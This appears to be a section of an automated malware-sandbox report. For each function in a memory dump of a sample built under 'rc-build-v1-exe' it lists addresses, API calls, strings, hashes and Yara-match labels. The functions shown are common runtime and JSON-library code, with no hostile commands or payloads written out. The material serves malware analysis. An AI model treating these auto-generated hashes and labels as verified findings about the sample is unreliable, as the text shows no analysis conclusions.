                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __freea$__alloca_probe_16
                                                                                                                                                    • String ID: a/p$am/pm
                                                                                                                                                    • API String ID: 3509577899-3206640213
                                                                                                                                                    • Opcode ID: 6a12b96aca3958b2c553db96ccfa7c4f7d2fa395526b3c136d155ceae645f3e4
                                                                                                                                                    • Instruction ID: 7a78f28e96a4c910ab5e9525f80835595db69007da29811e579c99550b95665c
                                                                                                                                                    • Opcode Fuzzy Hash: 6a12b96aca3958b2c553db96ccfa7c4f7d2fa395526b3c136d155ceae645f3e4
                                                                                                                                                    • Instruction Fuzzy Hash: 8BC1B13590021A9BCB148F68C6946BB7770FF17702F24405BEC02AB356D3BD9D4ACB5A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004141C3, Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 004141C8
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004141D6
                                                                                                                                                    • int.LIBCPMT ref: 004141ED
                                                                                                                                                      • Part of subcall function 0040A8E3: std::_Lockit::_Lockit.LIBCPMT ref: 0040A8F4
                                                                                                                                                      • Part of subcall function 0040A8E3: std::_Lockit::~_Lockit.LIBCPMT ref: 0040A90E
                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00414227
                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0041423D
                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00414252
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2251497708-0
                                                                                                                                                    • Opcode ID: b4cf747efd63f05660919a96191e36118ab2a694c4c358929a3e40cc5f67e6d4
                                                                                                                                                    • Instruction ID: f6504ed9534bc6443109f213dba8e240b6fab7aff9d076d44828d4e12caa3334
                                                                                                                                                    • Opcode Fuzzy Hash: b4cf747efd63f05660919a96191e36118ab2a694c4c358929a3e40cc5f67e6d4
                                                                                                                                                    • Instruction Fuzzy Hash: 9B110E72D001149BCB15EBA5D805AEE7774EFC8368F14496FF415A7280EBBC9E40C79A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00424329, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 67COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$m_it.array_iterator != m_object->m_value.array->end()$m_it.object_iterator != m_object->m_value.object->end()$m_object != nullptr
                                                                                                                                                    • API String ID: 3519838083-3557933457
                                                                                                                                                    • Opcode ID: 2e1f9b22fa52ca75ecf0c3b880472ae037e1d503e01dfc19b3479ca4d604ff7b
                                                                                                                                                    • Instruction ID: e950b036ffd5770865829e66238e936fa82c103c717bb74d0249f077e03f0eee
                                                                                                                                                    • Opcode Fuzzy Hash: 2e1f9b22fa52ca75ecf0c3b880472ae037e1d503e01dfc19b3479ca4d604ff7b
                                                                                                                                                    • Instruction Fuzzy Hash: 7A21FD70B002109BC324EB49D886FAAB7B9EFD0718F94841FE84697691D768E950CA5E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004625F5, Relevance: 7.7, APIs: 5, Instructions: 244COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004628B1,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00462698
                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0046274E
                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 004627E4
                                                                                                                                                    • __freea.LIBCMT ref: 0046284F
                                                                                                                                                    • __freea.LIBCMT ref: 0046285B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __alloca_probe_16__freea$Info
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2330168043-0
                                                                                                                                                    • Opcode ID: db4a3a8ae81df1d16a2b02b1919dda00ad2083f171df85ab2a01efea592f9cd1
                                                                                                                                                    • Instruction ID: cf28763b8a4b6638b3b38a60a1b497f98af9a70bda6c7f98a3e956be427e4414
                                                                                                                                                    • Opcode Fuzzy Hash: db4a3a8ae81df1d16a2b02b1919dda00ad2083f171df85ab2a01efea592f9cd1
                                                                                                                                                    • Instruction Fuzzy Hash: 2881F731D00A0ABBDF209E55CE41EEF7BB5AF09314F18055BE804B7251F6AD8C458BAA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0045E563, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free
                                                                                                                                                    • String ID: *?
                                                                                                                                                    • API String ID: 269201875-2564092906
                                                                                                                                                    • Opcode ID: d5c9a017ad7c170f7408022c8b0307fc6258e1ee6a2a04e80da516f0285226c4
                                                                                                                                                    • Instruction ID: 21b9b3c65e24d815a150a8f53a165d11761b7c90ca30ac4c3e74a9c0472bd392
                                                                                                                                                    • Opcode Fuzzy Hash: d5c9a017ad7c170f7408022c8b0307fc6258e1ee6a2a04e80da516f0285226c4
                                                                                                                                                    • Instruction Fuzzy Hash: DA6180B5D00219AFCF14CFA9C8815EEFBF5EF58314B25816AE814F7301E635AE458B94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040A7C7, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040A7CC
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040A7DC
                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040A819
                                                                                                                                                      • Part of subcall function 0043E398: _Yarn.LIBCPMT ref: 0043E3B7
                                                                                                                                                      • Part of subcall function 0043E398: _Yarn.LIBCPMT ref: 0043E3DB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Yarnstd::_$H_prologLocinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                    • API String ID: 2550485109-1405518554
                                                                                                                                                    • Opcode ID: c380996860c783ede6b369abab54c7fa4cf0fb719122f38726306d50d6e11bd1
                                                                                                                                                    • Instruction ID: 52dd220f90586e5af255d6811859e46bf7df649a371448ade8ff2c04167012da
                                                                                                                                                    • Opcode Fuzzy Hash: c380996860c783ede6b369abab54c7fa4cf0fb719122f38726306d50d6e11bd1
                                                                                                                                                    • Instruction Fuzzy Hash: 92015E71905B449EC721DF6A848058AFBF0BF18304B90896FE08AD3A41D334AA04CBAA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0045A3CE, Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3213747228-0
                                                                                                                                                    • Opcode ID: d523be67f163368be81c1195b6644eb03ce0a821fc465f7c3aa1777d6d2586ea
                                                                                                                                                    • Instruction ID: b918d69423621878dcff886ca914001d12798684bbbfdc2a4eb72d50a0554478
                                                                                                                                                    • Opcode Fuzzy Hash: d523be67f163368be81c1195b6644eb03ce0a821fc465f7c3aa1777d6d2586ea
                                                                                                                                                    • Instruction Fuzzy Hash: 53B13771900245AFDB11CF68C841BAEBBE5EF45345F19426BEC459B343E23C8D19CB6A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0044200B, Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                    • Opcode ID: d6b5e544dc4568dce4ab2688b94af989e4dcb6a078e86f52af9ebef23ca185bf
                                                                                                                                                    • Instruction ID: ee9a35a66baeb6d9ea61573d6f473ead20bb5c4f33816551e0a6020f20ca5197
                                                                                                                                                    • Opcode Fuzzy Hash: d6b5e544dc4568dce4ab2688b94af989e4dcb6a078e86f52af9ebef23ca185bf
                                                                                                                                                    • Instruction Fuzzy Hash: 4451E5716006029FFB289F11DA41B7BB7A4EF04314F64412FFA05972A1D7B9DD81CB58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004503AB, Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1d0fb64be0144edd63cd3329a1568fe3c24019b8a543e5a9120cce5e9b533fa7
                                                                                                                                                    • Instruction ID: 543323caf324e3849a6aac0b7ce42896ff4ff8a3cd6139e28915d6cd43d0de2f
                                                                                                                                                    • Opcode Fuzzy Hash: 1d0fb64be0144edd63cd3329a1568fe3c24019b8a543e5a9120cce5e9b533fa7
                                                                                                                                                    • Instruction Fuzzy Hash: 64413C75A00704AFE7249F79CC01B5ABBE8EB85715F10852FF911DB382D6B8A9458B84
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C2A4, Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___std_fs_open_handle@16.LIBCPMT ref: 0040C2C8
                                                                                                                                                    • ___std_fs_read_reparse_data_buffer@12.LIBCPMT ref: 0040C302
                                                                                                                                                      • Part of subcall function 0043DE71: DeviceIoControl.KERNEL32 ref: 0043DE8C
                                                                                                                                                      • Part of subcall function 0043DE71: GetLastError.KERNEL32(?,0040C307,?,00000000,00004002,?,?,00000080,02200000,?,?), ref: 0043DE96
                                                                                                                                                    • ___std_fs_get_file_attributes_by_handle@8.LIBCPMT ref: 0040C32E
                                                                                                                                                      • Part of subcall function 0043D709: CloseHandle.KERNEL32(000000FF,?,0043DDD1,?,?,?,00000080,?), ref: 0043D715
                                                                                                                                                    • ___std_fs_read_name_from_reparse_data_buffer@12.LIBCPMT ref: 0040C369
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseControlDeviceErrorHandleLast___std_fs_get_file_attributes_by_handle@8___std_fs_open_handle@16___std_fs_read_name_from_reparse_data_buffer@12___std_fs_read_reparse_data_buffer@12
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 719998554-0
                                                                                                                                                    • Opcode ID: 9fe56c0791779dec64669bb1aff1eb366d706d0a23911ccbf90311b4c8b6f7b0
                                                                                                                                                    • Instruction ID: 6f6f25a7e767471fea6fc1ce452a52fec943d0ab9599e1d8ddf4649374d4e5e6
                                                                                                                                                    • Opcode Fuzzy Hash: 9fe56c0791779dec64669bb1aff1eb366d706d0a23911ccbf90311b4c8b6f7b0
                                                                                                                                                    • Instruction Fuzzy Hash: 3031C671D11215EBDB11ABE69D819AFB7B8EF08704F14517BF900B62C1D7389A01879D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0045E494, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00450160: _free.LIBCMT ref: 0045016E
                                                                                                                                                      • Part of subcall function 00459848: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,004589DA,?,00000000,00000000), ref: 004598F4
                                                                                                                                                    • GetLastError.KERNEL32 ref: 0045E4FC
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 0045E503
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0045E542
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 0045E549
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 167067550-0
                                                                                                                                                    • Opcode ID: 4617b11e5fab65ace37d1152a0e28d0480df5a3f15cd3ce4160cb1ef8520d143
                                                                                                                                                    • Instruction ID: daa4795b3d505a097cfb756cebdab3b22a2c8f5634f19c371b6c97adf75335a8
                                                                                                                                                    • Opcode Fuzzy Hash: 4617b11e5fab65ace37d1152a0e28d0480df5a3f15cd3ce4160cb1ef8520d143
                                                                                                                                                    • Instruction Fuzzy Hash: 0921E7716002097FDF24AF678C4186B77ACEE0136D701452BFC1487242FB38DE0487A9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0045005F, Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 098f3b793a6c455dba866667dfb99eac40e8968b63f9513ee42252f0dc50c9a0
                                                                                                                                                    • Instruction ID: a02e2cbbce43f92db418e37ba90897477e9f12f1e9dae9d385db8bad74898cf8
                                                                                                                                                    • Opcode Fuzzy Hash: 098f3b793a6c455dba866667dfb99eac40e8968b63f9513ee42252f0dc50c9a0
                                                                                                                                                    • Instruction Fuzzy Hash: A921F575200505BF9F20AF629C81D6F779CEF1036A711451AFD1497243EB3DDC0487AA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00434441, Relevance: 6.1, APIs: 4, Instructions: 76stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenA.KERNEL32(?,?,751469A0,?,00000000), ref: 00434472
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,751469A0,?,00000000), ref: 00434491
                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,751469A0,?,00000000), ref: 004344B4
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000001B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,751469A0), ref: 004344E0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$lstrcpylstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3705784190-0
                                                                                                                                                    • Opcode ID: a72e04465fa1ea688e042f5f1eb8d2b53d55db2ddc9282e5dd8e88e9c1394a9f
                                                                                                                                                    • Instruction ID: 88c400df4b8a6f4116eb324f6c4165bab685fefdf02e8ba674e1a2173a562d0c
                                                                                                                                                    • Opcode Fuzzy Hash: a72e04465fa1ea688e042f5f1eb8d2b53d55db2ddc9282e5dd8e88e9c1394a9f
                                                                                                                                                    • Instruction Fuzzy Hash: B7219275900204BFEB189F68CC09BBA7BB9EF58300F14453EF841D6250EBB4AD40CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041820E, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 272COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID: `p|aw$suw
                                                                                                                                                    • API String ID: 3519838083-1348917673
                                                                                                                                                    • Opcode ID: 1e3e062f894c03315b3343c16150a444c1981c82215a85bf6ed8774bb2ac2e67
                                                                                                                                                    • Instruction ID: 666a90f0c19c09ba4e026c2a4568666ad83398d5796b807cedb8f4efe1ed0612
                                                                                                                                                    • Opcode Fuzzy Hash: 1e3e062f894c03315b3343c16150a444c1981c82215a85bf6ed8774bb2ac2e67
                                                                                                                                                    • Instruction Fuzzy Hash: 20B17A71D00248DBCF15DFE5C891AEEFBB1AF58304F24806EE41577282DB385A89CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0044260C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00442631
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EncodePointer
                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                    • API String ID: 2118026453-2084237596
                                                                                                                                                    • Opcode ID: 6970c0d46c36f865acf1cadc2d4b58d4ef5846c1276ea3effbcdeba5a29db8a5
                                                                                                                                                    • Instruction ID: c9db72bf1e7e37e675b7fa1fb82518606c04c9bc37e1472341cf6e4b0a6d48c7
                                                                                                                                                    • Opcode Fuzzy Hash: 6970c0d46c36f865acf1cadc2d4b58d4ef5846c1276ea3effbcdeba5a29db8a5
                                                                                                                                                    • Instruction Fuzzy Hash: B041AC71900209EFEF16DF94CE81AEEBBB5FF48304F15809AF904A7211D7799950CB58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041A104, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0041A109
                                                                                                                                                      • Part of subcall function 0041A237: __EH_prolog.LIBCMT ref: 0041A23C
                                                                                                                                                      • Part of subcall function 0041A01B: __EH_prolog.LIBCMT ref: 0041A020
                                                                                                                                                      • Part of subcall function 004133AD: _Deallocate.LIBCONCRT ref: 004133BC
                                                                                                                                                      • Part of subcall function 00419FE6: std::exception::exception.LIBCONCRT ref: 0041A007
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog$Deallocatestd::exception::exception
                                                                                                                                                    • String ID: parse error$parse_error
                                                                                                                                                    • API String ID: 3877490255-1820534363
                                                                                                                                                    • Opcode ID: 65cd58b8e730536b59ce7c70d04055ed4fe80b41072eb7daf61d752707fc1a68
                                                                                                                                                    • Instruction ID: 2e759051a8420c26a8432a00f8acd01f313dc470675d4029abbdc962150c9f7c
                                                                                                                                                    • Opcode Fuzzy Hash: 65cd58b8e730536b59ce7c70d04055ed4fe80b41072eb7daf61d752707fc1a68
                                                                                                                                                    • Instruction Fuzzy Hash: C7314831E002489FCB14EFA5C855ADCBBB4AF14304F5080AFE819A3292DB781F89CB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0042447C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 0042453A
                                                                                                                                                    • object != nullptr, xrefs: 0042453F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
                                                                                                                                                    • API String ID: 3519838083-2355325030
                                                                                                                                                    • Opcode ID: 012fe84570e4479057212fcf27a2578e3b1f13ed81b65247b4c3e703132dde9d
                                                                                                                                                    • Instruction ID: 363bac711d227208099aa325bdfe69e2f3a57c96361be79bdecd89b28e495a3d
                                                                                                                                                    • Opcode Fuzzy Hash: 012fe84570e4479057212fcf27a2578e3b1f13ed81b65247b4c3e703132dde9d
                                                                                                                                                    • Instruction Fuzzy Hash: 12313575B00616ABC711DF6AD051ABAFBB0FF84304F10811FE199A7750C738EA40CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041A237, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0041A23C
                                                                                                                                                      • Part of subcall function 004133AD: _Deallocate.LIBCONCRT ref: 004133BC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DeallocateH_prolog
                                                                                                                                                    • String ID: at line $, column
                                                                                                                                                    • API String ID: 3708980276-191570568
                                                                                                                                                    • Opcode ID: e9a539fa30b0eb283db47fcf4dc01529bda557283f7d927dc0d83f4bec640e79
                                                                                                                                                    • Instruction ID: 85bf8d45fe01c0b8309e4d16ddfa79a48d618f6ab1b916e4bf00560e18646aaa
                                                                                                                                                    • Opcode Fuzzy Hash: e9a539fa30b0eb283db47fcf4dc01529bda557283f7d927dc0d83f4bec640e79
                                                                                                                                                    • Instruction Fuzzy Hash: B821A171A101189FCB09EBA5C851BEEB778EF94314F40815FE416A3181EF781F89CB65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041A328, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0041A32D
                                                                                                                                                      • Part of subcall function 0041A01B: __EH_prolog.LIBCMT ref: 0041A020
                                                                                                                                                      • Part of subcall function 004133AD: _Deallocate.LIBCONCRT ref: 004133BC
                                                                                                                                                      • Part of subcall function 00419FE6: std::exception::exception.LIBCONCRT ref: 0041A007
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog$Deallocatestd::exception::exception
                                                                                                                                                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$inv_iter
                                                                                                                                                    • API String ID: 3877490255-2196778670
                                                                                                                                                    • Opcode ID: 8713d7795a3a8f9a91e2b49c00d635724029f6d6fbb0ec88af5c5692541085b9
                                                                                                                                                    • Instruction ID: 7851f1c65d7f408a91b92c62dc7c901600b415eb261a1a2a75f5f441c47f32f0
                                                                                                                                                    • Opcode Fuzzy Hash: 8713d7795a3a8f9a91e2b49c00d635724029f6d6fbb0ec88af5c5692541085b9
                                                                                                                                                    • Instruction Fuzzy Hash: 2911F871E00218DFCB15EF9AC8919EDBBB5FF48314F54402FE816B3241DB785A85CA69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004246F2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • m_object != nullptr, xrefs: 0042471A
                                                                                                                                                    • A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00424715
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$m_object != nullptr
                                                                                                                                                    • API String ID: 3519838083-1282721270
                                                                                                                                                    • Opcode ID: 655ab7c622704aeb0cf23b1951378fddb7a184859028a82e8490b0c4a7343327
                                                                                                                                                    • Instruction ID: f0d2a4e069e067bcb62dcac80c08ef1cbfbaeb074ef559d04307ca3b4a06e212
                                                                                                                                                    • Opcode Fuzzy Hash: 655ab7c622704aeb0cf23b1951378fddb7a184859028a82e8490b0c4a7343327
                                                                                                                                                    • Instruction Fuzzy Hash: EF11CB71A002109BC310EF59D981E9EB7F4EF91314FA0881BE465E3A40D738FE40CA59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0042487D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 004248C1
                                                                                                                                                    • object != nullptr, xrefs: 004248C6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
                                                                                                                                                    • API String ID: 3519838083-2355325030
                                                                                                                                                    • Opcode ID: 9794275fd6aec85f622ec9dfbb1eba229f0f17f466631e95fd2d4a7479d01dbd
                                                                                                                                                    • Instruction ID: 50a0b6d33d9548105921d54a664e11dd322fd393db54033f65c3a122ab546cf7
                                                                                                                                                    • Opcode Fuzzy Hash: 9794275fd6aec85f622ec9dfbb1eba229f0f17f466631e95fd2d4a7479d01dbd
                                                                                                                                                    • Instruction Fuzzy Hash: BCF062B1E403149BC721EFA9A40268EBFF4EB98750F10453FE449E7640E778861487D9
                                                                                                                                                    Uniqueness

